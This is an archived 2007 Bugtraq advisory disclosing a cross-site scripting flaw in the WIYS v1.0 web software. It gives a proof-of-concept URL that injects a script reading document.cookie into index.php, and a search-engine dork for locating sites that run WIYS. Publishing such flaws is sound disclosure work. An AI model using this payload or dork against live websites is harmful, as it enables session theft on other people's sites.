lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY12-F18EB97527962AD76F828A2F8340@phx.gbl> Date: Thu, 24 May 2007 09:42:03 +0000 From: "vagrant - e-hack.org" <kernel-32@...mail.com> To: bugtraq@...urityfocus.com Subject: WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW) WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW) Vulnerability: http://www.target.com/index.php?Page=Sayfa&No="><script>alert(document.cookie)</script> Vulnerable: WIYS v1.0 Google d0rk: Bu site FORSNET tarafından WİYS Yazılımı ile hazırlanmıştır. Script : http://www.forsnet.com.tr/yazilim/wiys.html ----------------------------------------------- >>> Credits : Vagrant Contact : kernel-32 (at) hotmail (dot) com [email concealed] Site : e-hack.org 05.24.2007 _________________________________________________________________ Dikkatsiz mesajlaşma tehlikelidir! http://www.communicationevolved.com/tr-tr/